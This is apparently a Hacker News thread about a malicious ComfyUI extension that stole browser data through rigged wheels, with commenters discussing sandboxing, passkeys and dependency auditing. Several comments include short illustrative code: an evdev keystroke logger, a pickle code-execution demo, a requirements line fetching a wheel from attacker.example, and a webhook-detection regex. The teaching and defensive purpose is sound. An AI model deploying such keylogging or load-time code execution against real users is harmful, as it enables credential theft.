A lesson for people who download and run stuff without looking at the code first.
Is there no way to defend against a keylogger? What can you do if a simple keylogger can steal your passwords?
Aside from not using passwords or using 2FA, sandboxing helps.
A VM with GPU passthrough would be one example (although that's usually a pain to set up, and I expect most people aren't doing it).
As a more user-friendly example, if you install an iOS app (local-model LLM and image generation apps exist), the sandboxing provided by the OS ought to be more than enough to prevent keyloggers, short of 0day exploits.
Not as secure as VMs, but GPU passthrough with Docker/Podman is much easier to set up, and you can even use the GPU on the host machine at the same time.
Are you giving it access to /dev/dri, or doing some fancier sandboxing?
(Would you even need anything fancier? I think /dev/dri is supposed to isolate users.)
Nvidia provides a toolkit to do this [1]; getting a GPU into a container is as easy as running `podman run --device nvidia.com/gpu=all`. The process is similar for Docker, but rootless Docker requires some extra steps IIRC.
[1] https://docs.nvidia.com/datacenter/cloud-native/container-to...
Ideally, don't use passwords: Passkeys where supported, SSH Keys, client certificates, social login via a service that does support one of these methods.
Magic-link emails can also work, but they're potentially vulnerable if you copy/paste the link rather than clicking it, depending on the keylogger's capabilities and its visibility into the clipboard. The window for attack is small, though, and it's a much more sophisticated attack that leaves more traces (good sites will reject link reuse).
Second best, also use a second factor: U2F ideally, TOTP with the same caveats as magic-link emails, and at the bottom of the barrel SMS, which is better than nothing but known to be very flawed.
Honestly, if you are anything other than a casual user, and don't have devices with support baked in already, it's crazy not to spend ~£60 on a pair of security keys for passkey/U2F. It's not a lot of money and is just so much more secure.
Ideally, don't use passwords: Passkeys where supported, SSH Keys, client certificates, social login via a service that does support one of these methods.
If a process has the privileges to run as a keylogger, it can also grab your local SSH private keys and possibly harvest passwords and passkeys from your local password manager vault [1]. The process has local access and, since it is a keylogger, presumably your master password too. (The complexity depends a bit on the password manager; e.g. IIRC the macOS keychain always requires a round trip through the Secure Enclave.)
Honestly, if you are anything other than a casual user, and don't have devices with support baked in already, it's crazy not to spend ~£60 on a pair of security keys for passkey/U2F. It's not a lot of money and is just so much more secure.
100% this. A secure enclave or a hardware key is the only way to keep your key material safe.
Also, app sandboxing should be the default. macOS App Store Apps are sandboxed. Unfortunately, these days the standard is still for applications to have unfettered access to a user's files.
[1] Passkeys can also be on a security key, but e.g. Yubikeys only have a small number of resident key slots and I think passkeys to most people means key material synced through iCloud/1Password/your favorite cloud.
When I talk about passkeys, I definitely mean hardware by default, which is how most websites position it: it's normally described as "set up a passkey for this device", and in practice the vast majority of people using them will be using a fingerprint reader on a laptop or phone, because most people don't set up password managers with passkeys.
To me, using software for passkeys is a hack only power users will do, and yes, I see it as a bad idea.
Right now I believe Yubikeys can hold 25 passkeys, which is a pretty low limit, but it's enough to protect your most important accounts, and I doubt many people currently use more than 25 sites that support passkeys (hopefully that number goes up quickly, of course).
"keylogger" may not be the right term here? I'm not familiar with how that term is broadly used for, but my definition of that term is a tool that logs your keypresses. Here, it seems like it was scraping your chrome/firefox data for login cookies?
Honestly, there's quite a lot of malware that goes after those files. I wonder if there's a way to require elevated privileges for accessing Chrome/Firefox appdata, or to just block other apps from it entirely.
Yeah, you're right, people misuse the term keylogger frequently. These kinds of malware are broadly called "stealers" and usually don't involve keylogging.
Actual keyloggers tend to be rare nowadays, since they're easier to detect and browser data is generally the more valuable target.
I mean, anything with root access can very easily use libevdev to get all keystrokes as well as mouse positions. (It's maybe 10 lines of code to do that).
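For illustration, here's a minimal sketch using the python-evdev bindings; it's essentially what the `evtest` utility does. (The device path is machine-specific and assumed here; reading /dev/input requires root or membership in the input group.)

    from evdev import InputDevice, ecodes  # pip install evdev

    # Device path varies per machine; enumerate with evdev.list_devices().
    dev = InputDevice("/dev/input/event3")

    for event in dev.read_loop():
        if event.type == ecodes.EV_KEY and event.value == 1:  # key press
            print(ecodes.KEY.get(event.code, event.code))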
So, don't run stuff as root. If it needs root access, run it in a virtual machine (personally I use Qubes OS for this).
Use 2FA I'd imagine.
Some entity called Nullbulge Group claims they took over the repo.
Today's capture (from before the repo got 404'd) has their belligerent spiel. https://web.archive.org/web/20240609135118/https://github.co...
This is the capture from 3 days prior: https://web.archive.org/web/20240525021402/https://github.co...
I have not seen a statement from Nullbulge so it's not appropriate to say that they took over the repo.
The author of the repo is claiming that their repo is hacked, but this is an obvious lie, because their very first GitHub commit is the one where they push the malware. Nobody would hack an empty GitHub account.
I don't know if the author of the repo is lying when they say that Nullbulge is behind the attack (perhaps the author is part of Nullbulge, perhaps not).
I wouldn't be so sure no one would hack an idle account. I had my Spotify account taken over before I'd even used it. I think in my case they used my account to pump up other lesser-known artists.
There was also an actively exploited XSS vulnerability on GitHub in recent days.
Doesn't mean that this guy was not a malicious actor, only that one shouldn't be so quick to cast stones without evidence.
The person who created the custom node is the same person who "hacked" it. Whether or not the account is technically owned by some unrelated civilian is not important, because there is no other activity on the account.
Okay, sure. But if we have an account which has never had any legitimate activity on it ever - an account that has only ever been used to push malware - then I don't know if it matters much who is the "rightful owner" of the account. Things would be different if the GitHub account had some legitimate activity before the "hack".
I agree it doesn't matter much. Could be a noob mistake by the account owner and this is damage control.
Must be script kiddies. You have the opportunity to deploy anything to a machine that almost certainly has a powerful GPU, and you choose a keylogger that exists in signature databases? Genius.
A quick search reveals anti-AI-motivated script kiddies. Also some degen NSFW "art" content on DeviantArt and Reddit under the same name, their likely origin.
Telegram and Discord webhooks are 100% signs of an unsophisticated attacker, and they are a very common sight in malware samples. GitHub is full of skiddie "info stealer" projects that use the Telegram API or Discord webhooks to deliver the stolen data. They make no sense to use, since anybody can spam the webhook endpoint. Not 100% sure about Discord, but at least in the case of Telegram, anybody can even read and download all the data that has been sent to it.
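As a crude illustration of how blatant these are, the endpoints usually sit in the source in plain sight, so a few lines of Python can flag them (a sketch, not a real detector; the regex only covers the two services mentioned):

    import pathlib
    import re
    import sys

    # Matches Discord webhook and Telegram bot API URLs embedded in source.
    WEBHOOK_RE = re.compile(
        r"https://(?:discord(?:app)?\.com/api/webhooks|api\.telegram\.org/bot)\S+"
    )

    for path in pathlib.Path(sys.argv[1]).rglob("*.py"):
        for match in WEBHOOK_RE.finditer(path.read_text(errors="ignore")):
            print(f"{path}: possible exfiltration endpoint: {match.group(0)}")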
Something is fishy here.
According to the original report, the "keylogger" was in the custom wheels in requirements.txt, but looking at that repository, there have been only two commits, both of which, according to Reddit, contained malicious code.
Of course, proper discovery would be easier if the GitHub account still existed.
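For context on the mechanism: pip will happily install a requirement that points at an arbitrary wheel URL, so a single line in requirements.txt is all it takes (the package name and URL below are made up for illustration):

    # Normal pinned requirements resolve from PyPI:
    torch==2.3.0
    # A direct-URL requirement installs whatever wheel the attacker hosts
    # (hypothetical example):
    some-node-helper @ https://attacker.example/some_node_helper-1.0-py3-none-any.whl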
How do people feel about using docker to prevent this sort of thing? Does it strike the right balance between usability and security?
Well, Docker is great for this as long as you're not one of the unlucky few whose machine is bricked because of Docker. So, mostly yes, I suppose.
What does that even mean?
"Bricking" is when your electronic device stops working, i.e. becomes a brick. Docker is known to occasionally brick Windows machines.
Wait… what!?
This is the first I’m hearing of this. Do you have any references?
You can find plenty of references by googling variations of the keywords Docker, Windows, brick.
Googled that (thanks for not providing clear references for your claims) and found that Docker can crash Windows on boot, but not "brick" it. People are still able to boot into safe mode, run system recovery/restore, or even reinstall Windows if they choose.
Besides, bricking something via software is impossible; "bricking" refers to physical devices that are unable to bootstrap anymore.
Not exactly. A hard brick is what you're referring to, where the hardware needs an OEM repair/reset after corruption.
A soft brick is what's actually being referenced here, where you can easily recover via software/reinstall.
Docker itself doesn't seem to have the best quality control for its official releases, so blindly upgrading Docker will likely bite you in the ass if you do it for a few years. :(
Doesn't Docker have this weird property where it bypasses your firewall?
https://www.techrepublic.com/article/how-to-fix-the-docker-a...
What about second firewalls?
Hobbit jokes aside, yes, it pokes holes in the firewall on the machine hosting Docker. It generally creates a lot of firewall rules to isolate or permit traffic to/from containers and expose ports.
Your "safest" bet is probably to only expose docker containers on the localhost interface, and use a reverse proxy (Nginx/Traefik/etc) to expose services. At least that's how i did it when i last ran Docker a few years ago.
What can be done to stop all this? We need some sort of OS-level layer to validate these things. If we put a local LLM in place that checks the bytecode of everything being installed or run, will that solve all this? My heart goes out to those who must have lost money because of this.
One basic measure (one part of a solution) would be to split Comfy into two parts: the part that does all the work (running plugins, generating images) should have nothing but read-only access to the files it needs, the GPU, and a socket for communicating with the other part.
You mean a cleaner API, one which exposes only what is necessary?
I meant sandbox the less trusted bit.
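Something like this, as a toy sketch of the split over a Unix socket (the actual confinement of the worker, e.g. dropping privileges, namespaces, read-only mounts, is not shown, and the socket path is made up):

    import json
    import os
    import socket

    SOCK_PATH = "/tmp/comfy-worker.sock"  # hypothetical

    def worker():
        # Untrusted side: runs plugins. In a real design this process would
        # be confined: no network, read-only model files, GPU access only.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as srv:
            srv.bind(SOCK_PATH)
            srv.listen(1)
            conn, _ = srv.accept()
            with conn:
                job = json.loads(conn.recv(4096))
                # ... run the plugin / generate the image here ...
                conn.sendall(json.dumps({"ok": True, "job": job["name"]}).encode())

    def frontend():
        # Trusted side: talks to the user, never executes plugin code itself.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as cli:
            cli.connect(SOCK_PATH)
            cli.sendall(json.dumps({"name": "generate-image"}).encode())
            print(json.loads(cli.recv(4096)))

    if __name__ == "__main__":
        if os.path.exists(SOCK_PATH):
            os.unlink(SOCK_PATH)
        if os.fork() == 0:
            worker()
        else:
            import time
            time.sleep(0.2)  # crude: give the worker time to bind
            frontend()

Even then a compromised plugin could return poisoned results, but at least it couldn't read your browser profile or phone home.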
Well, for one, the keylogger is detected by antivirus programs.
I keep coming across various projects whose executables trigger antivirus programs, and I think that when those triggers happen, "it's fine, don't worry" claims need to be treated with more skepticism.
At the same time, antivirus vendors need to stop being so lazy and stop building their signatures from strings that are clearly part of an open-source program or library.
I believe there should be a clear indicator in the UI of every OS whenever a new program listens to your keystrokes. It should be the norm.
If you compile a benign binary yourself which has no malware, Chrome and Windows Defender will flag it as suspicious.
I was hacking on some open source stuff targeting win32, I posted some binaries on GitHub releases, I tried to share with others... People tell me it's flagged as malware. It isn't malware. What do I tell them?
I hear code signing helps with the heuristics so binaries are less likely to get flagged, but it doesn't eliminate the problem.
If people working on said software want the warnings to be taken seriously, they should work on reducing false positives.
I think this is one of the use cases for a sandboxed WASM plugin system.
But almost everyone working on these plugins really wants to use Python and PyTorch.
Has nobody ported Python to WASM yet?
Why does there seem to be such a disregard for security in deep learning?
There are examples like this post, but also, until recently, almost every deep learning model was literally distributed as a pickle file.
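For anyone who hasn't seen why that's a problem: unpickling is arbitrary code execution by design. The classic minimal demonstration:

    import os
    import pickle

    class Evil:
        def __reduce__(self):
            # Tells pickle: "to reconstruct this object, call os.system(...)".
            return (os.system, ("echo arbitrary code ran at load time",))

    payload = pickle.dumps(Evil())
    pickle.loads(payload)  # merely *loading* the data runs the command

That's a big part of why safetensors, which stores pure tensor data with no executable objects, took over.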
It's not specific to deep learning; practically every industry looks at security as a cost that's just not worth it. When we start throwing CEOs in jail instead of making them pay an 18.5M fine for losing the data of 41 million customers, that's when things will change. Until then, it's just the cost of doing business.
Really? Throw a CEO in jail? This is just as crazy as the whole throw-the-supervisor-in-jail-if-a-worker-dies mantra in construction.
#1: Users are responsible for looking after their own privacy. If you're using applications that don't allow this, you need to reject those applications.
#2: This needs to start happening in massive numbers. People need to rise up against these crazy corporate tech companies and their bull
I would love to live in a world where everyone did that. But that's (currently) a utopian pipe dream.
I don't know if throwing CEOs in jail is the answer, but neither is putting all the responsibility on people to make tough choices like "give up my privacy or fall out of touch with my friends" or "give up my privacy or give up the chance to get this job".
Well, we are currently at the "we tried nothing and we are out of ideas" stage so something needs to change.
From my outsider perspective, it's a field that moves very fast; there seem to be new tools released every week, so:
1) As a developer, if you focus on hardening, you might release too late.
2) People are constantly downloading shiny new libs/files/programs.
3) There's an influx of people not well versed in the basics of computer security playing around with local LLM models, image generators, etc.
That seems like an almost exact duplicate of the NodeJS/NPM issues?
Those same points (the NodeJS/NPM versions of them) are a lot of why that ecosystem is having security and reputation issues as well.
"Security is not my field, I'm a stats guy": a qualitative root cause analysis of barriers to adversarial machine learning defenses in industry [0]
Isn’t this just one of the milestones that’ll eventually happen? Blind panic due to security always occurs at some point. There must be a ‘law’ defined for this somewhere.
I'm curious if it'd be possible to use a Code LLM to scan GitHub repos and detect possible malware hiding in source code.
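It's trivial to prototype, at least. A rough sketch using the OpenAI Python SDK (the model name, prompt, and filename are placeholders, and the output would obviously need a human in the loop):

    from openai import OpenAI  # pip install openai; expects OPENAI_API_KEY

    client = OpenAI()

    def review(source: str) -> str:
        resp = client.chat.completions.create(
            model="gpt-4o",  # placeholder model name
            messages=[
                {"role": "system", "content": (
                    "Review this Python code for malware indicators: "
                    "exfiltration endpoints, credential or browser-data "
                    "access, obfuscated payloads. List findings or say "
                    "'clean'.")},
                {"role": "user", "content": source},
            ],
        )
        return resp.choices[0].message.content

    print(review(open("custom_node.py").read()))  # hypothetical file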
I have a feeling that we'll be seeing some businesses built around exactly that.
GitHub? ;)
Socket.dev isn't built around this, but it makes use of it.
I'm afraid a few simple tweaks, especially if the hackers themselves have access to the code LLM to try out their code, will be sufficient to evade detection.
An endless race, like with antivirus software.
If such a tool became commonplace, bad actors would just run it on their own malware and keep tweaking it until the LLM failed to detect it.
Looks like a pretty small project. Only had 40 stars on GitHub before the repo was removed.
Was this the main method of GPT4 and Claude integrations for ComfyUI?
It was an extension for ComfyUI, which has 37k stars on GitHub. The way ComfyUI is commonly used is that a person shares a "workflow" file, which utilizes various obscure extensions (called "custom nodes") and then the people who want to run the workflow on their own computer will install all these obscure custom nodes that have like 40 stars on GitHub or so.
Just like an npm install
Using stars as a popularity metric doesn't work.
I have personally never starred anything that I use, and 90% of the open source I use isn't on GitHub.
Not surprised at all, ComfyUI extensions are just arbitrary python code. The first time I tried ComfyUI extensions I put it in a podman container with GPU passthrough and blocked network access.
Hopefully this will be just the incentive they need to do something safer. Something similar happened before the move from pickle to safetensors for model files.
ComfyUI Manager recently added some security levels, so that by default you can't accidentally leave up a public instance that allows remotely installing arbitrary Python code: https://github.com/ltdrdata/ComfyUI-Manager?tab=readme-ov-fi...
I peered down the ComfyUI rabbit hole [1] and it is shockingly powerful. Did Adobe drop the ball on image generation? What are they doing over there? There has to be a better, more secure way to bundle up all this imagegen logic.
[1] https://learn.thinkdiffusion.com/bria-ai-for-background-remo...
Adobe makes practical pipelines for creatives, not prototyping tools. ComfyUI is mostly for prototyping and ML nerds (I don't mean this in a bad way). There are more practical interfaces to get things done built on top of it, such as Krita Diffusion [1] and many others.
Yep, it's super powerful.
I would say that the "more secure way" is to just use ComfyUI without installing any obscure nodes from unknown developers. You can do pretty much anything using just the default nodes and the big node packs.
That discussion on Reddit really is something else; so much misinformation and pretend knowledge at work. It's as scary as the malware.
And this is the input for AI training...
Not just any input, but paid input :-)
The user's reddit profile: https://archive.is/G5GIW
They have a couple of other tools hosted on HuggingFace, both of which have the malicious dependencies and require entering API keys, namely:
"SillyTavern Character Generator": https://archive.is/gETq3 (requirements.txt: https://archive.is/xqqtA)
"Image Description with Claude Models and GPT-4 Vision": https://archive.is/6Ydgs (requirements.txt: https://archive.is/9Sp5C)
They've also posted some BeamNG mods, and were casting doubt on accusations that some other account's mod contained malware: https://archive.is/zLiaZ
That other account's reddit profile: https://archive.is/r9V1M
No domain or website registered?
Which is everybody in the world except for a handful of people.
Not really, and it takes a few minutes, because most of these packages (including npm packages) are small. You don't have to read the WireGuard codebase because it's reputable enough, but for obscure or unknown add-ons/package code, it's on you to double-check, just like reading the readme.
I haven’t looked at the source code of a single npm package I’ve installed in the past 5 years.
“It takes a few minutes”
Dude, my web dev projects have like thousands of dependencies. I'm not going to check the source code of every package Tailwind requires.
Even if you did review it, a motivated attacker is not going to ship an exfiltrate_user_data(). The xz backdoor was incredibly sophisticated, and one key part of the design was sneaking a "." into a single line of a build test script.
A cursory audit of primary dependencies has almost zero chance of catching anything but a brazen exploit.
Yeah. Realistically, I think the best course of action is to just assume you're already using a library that can exfiltrate data.
This requires allowlisting egress traffic and possibly even architecting things to prevent any one library from seeing too many things. This approach can be a big pain though and could be difficult to implement practically.
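As a sketch of the in-process version (trivially undone by genuinely malicious code, since it shares the interpreter, so real enforcement belongs in the OS or firewall; the allowlist below is made up):

    import socket

    ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}  # hypothetical

    _real_create_connection = socket.create_connection

    def _guarded_create_connection(address, *args, **kwargs):
        host, _port = address
        if host not in ALLOWED_HOSTS:
            raise PermissionError(f"egress to {host!r} blocked by allowlist")
        return _real_create_connection(address, *args, **kwargs)

    # Most high-level HTTP clients (urllib, requests) funnel through here.
    socket.create_connection = _guarded_create_connection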
So just sneak the code in a dependency of a dependency.
Who’s diving 3-4 layers deep into dependencies?
No need to hide it inside dependencies; just modify the code before building and pushing the package to PyPI.
IMO this makes no sense. There's zero chance you'll start inspecting all dependencies even in a relatively small application, which nowadays can already pull in a large number of deps.
I don't see how doing any of this manually will help.
Would you have caught the XZ backdoor?
You can't "not really" this away. Most people don't bother looking at small package code, much less code for packages that are far more complex.
This is why I refuse to use almost anything on npm. If you have a zero dependency project I'll consider it. If you have a dependency that also has a set of dependencies then I will never use your code.
Most people should only download software from people they trust (to not be evil and also to be competent).
If you download code off some unknown person's GitHub repo, you'd be stupid not to read it very very carefully!
Ain't nobody got time for that. LLMs should be capable of analysing code for anything malicious / suspicious.
Unfortunately, no, because the existence of LLMs that can automatically flag suspicious code will be offset by the existence of LLMs that can generate malicious code that bypasses the detection abilities of the aforementioned LLMs.
Generative Adversarial LLMs, let’s go!
Perhaps we could just call these ALLMs (Adversarial Large Language Models). You're already dropping the N in GAN; I see no need for the G.
The end result, I think, is that someone clever could make a LLaMA pun out of the name of a LLaMA-based ALLM.
Since LLMs and keyloggers are both Turing machines, it won't happen. (Or more precisely: it won't beat the cat-and-mouse game of obfuscation.)
No, they cannot work with large codebases, not yet, and they have very limited talent for logic and debugging. They may improve at some point, probably by being hooked up to external tools.
Everyone runs code they have not inspected. For example, almost no one has read all of the code in FreeBSD, Linux (the kernel), macOS, OpenBSD, or Windows. I also doubt people are reading all of the code in their favorite Linux distribution.
Even inspecting the code is not enough because a lot of security vulnerabilities are not obvious. Basically, security is hard, and often there are not a lot of good solutions.
Here are some tricks I have found which have helped me minimize my risk:
1) Use different machines for different purposes. Basically, you should not use 1 PC (or Mac) for everything. I have one for my finances, one for gaming, and a general-purpose PC. If one gets hacked, the others are still fine.
2) Get software from trustworthy sources. Most of the major software companies are not going to ship malicious code. For open-source software, use software from popular projects which have a good reputation.
3) Ask yourself why someone is providing this software. Is it for money? Are they creating it because they enjoy it? How do they support themselves? For example, Google's business model is building dossiers on people so it can deliver ads they are more likely to click on. When Google gives you something for "free", it will probably use it to track you, or track visitors to your website.
4) Support the people who build the software you use. If it's commercial software, pay for it; do not pirate it. If it's open source, donate time or money to the projects you use. Also, thank the people who work on the software, and ALWAYS treat them with respect.
5) Avoid pirated software, software from "free" porn websites, etc. People who provide illegal or sketchy software are probably willing to put back doors in it.
On this topic, how much should a person trust the central repositories of well-known operating system distributions (e.g. Arch, Debian)? I know only trusted people can upload to them, and the only time I've ever heard of malware slipping past was the xz backdoor, but I don't know how much care they take.